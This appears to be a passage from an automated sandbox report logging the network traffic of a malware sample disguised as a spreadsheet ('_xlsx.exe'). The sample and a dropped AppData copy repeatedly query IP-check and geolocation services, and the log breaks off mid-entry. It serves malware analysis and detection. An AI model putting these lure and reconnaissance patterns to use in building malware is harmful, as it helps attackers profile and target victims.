Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49744	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:41.712762117 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:43.409209013 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:43 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49746	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:44.016186953 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:44.908319950 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:44 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49748	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:45.514446020 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:46.922441959 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:46 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:46.922502995 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:46 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 26, 2024 09:00:46.922534943 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:46 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49750	132.226.8.169	80	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 09:00:47.561557055 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 26, 2024 09:00:48.374665022 CEST	272	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:48 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	188.114.96.3	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:19 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:19 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:19 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86078 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bzqs2FRFpE5qib1Il0BWbhFetmH%2Bs1D2dzxIZFTuhtVkzYA0rRlkyQ2Pk%2Bd8A%2FXsmdhcQA5qVexlKZHxf8h8iIP%2FW9QXZ%2F7rIbdu3WUridwdjDY1gwFEbMs4fY7YihLhiqEaBqKb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c916054cc5c4223-EWR
2024-09-26 07:00:19 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49716	188.114.96.3	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:20 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:00:20 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:20 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86079 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xviN2m4Kfde%2BgY9fWMWixDs3QbABSe0KJ%2BjIPrbtX5INreJfWaPW7pI5SCgnnIILM%2BhNmC5C2OX5e7VeKp3GHtPz7zJ1w7EAhPnvMWzJMNeg6Dqw4ac85V%2B7FOhILokuJd2mwxcO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91605a986072a1-EWR
2024-09-26 07:00:20 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49720	188.114.96.3	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:21 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:21 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86080 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTe6OtMoEufEKkkTS3skYX6sMu0AViskfgguRBuD9LYzWIc6qKtc2uLGf6o10ZgnhVObQqTJNV0aXq7FfuKOCHiZ%2FBlJBj0rnCzSaSipa%2B2jE0CJ7t1SXXkSM0%2B5iN5h6OI%2FTPyc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91606489a717d9-EWR
2024-09-26 07:00:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49722	188.114.96.3	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:24 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:24 UTC	680	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86083 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BxKngVmsLLfdByGUmPp00%2FleUyaumR%2Bz0VlJ8qSx6RalqMMju2h1UIw%2BWVBdv2uqqwgaEAOZ57%2Bgv%2B2WajEbkbv2ob0UgBA1Aisme1FC2Jhu25vyJedOC0rY6wI7h7lwkUCAjKBk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c916074ded78ca8-EWR
2024-09-26 07:00:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49724	188.114.96.3	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:27 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:27 UTC	678	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:27 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86086 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXMCOqAPauSGQmG21dfhSGqDN83tFM77jXX9bbjKb8%2BpwWkbAZ%2B1c7X108BxmLKIiGd9ZPRfd%2FTHwBhVYJvmukhRWmL%2FKnUCnvGPNcbImGrynkwcP4os8ZJ4fewRNLRCCAdaAvMy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c916085ab424394-EWR
2024-09-26 07:00:27 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49726	188.114.96.3	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:28 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-26 07:00:28 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86087 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hp6qDu2vauFgLWOfs%2F33r7KMeseUbxdacQah93rtZnwr6OiXsMl37NcicevJexaRO1%2F%2FmnDSmyi5W0x0fgYjV8l%2FDZTyhrAljOyR8KXkZn0tzDFTOc1bF09RTVZNl%2FyCg9%2FOr0LN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c91608ecb2143ee-EWR
2024-09-26 07:00:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49729	188.114.96.3	443	7360	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:31 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86089 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u5Fma2ZuGx%2BbDzZ7RNBzqeId%2Fp6kSUZ2eVKUrMovBaJE94I9aW9wU481TUo1%2FYBaj7fCakrPkF6xDb4y%2F02d5x%2FCSh8Ie3%2FZj1Zb1Kkdk4eDOYmd7jZI1NnEMgpD2zawEmkmoSWd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160988a0017e1-EWR
2024-09-26 07:00:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-26 07:00:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49731	188.114.96.3	443	7732	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 07:00:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-26 07:00:32 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 07:00:32 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 86091 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrktvuWi%2BPFj9yeIfnYJYEQRs4PYlZfDfcX9KbOdPqpNJmH1u5uBH1AQBPxUejxf%2BpJTes%2FrGv%2F3%2FfSub3gM7u3J64EFGTCK23z4KxKezoNvtege5FLK5tJFC3sOoyALQ%2FpzvuEz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9160a5dc281993-EWR
2024-09-26 07:00:32 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United 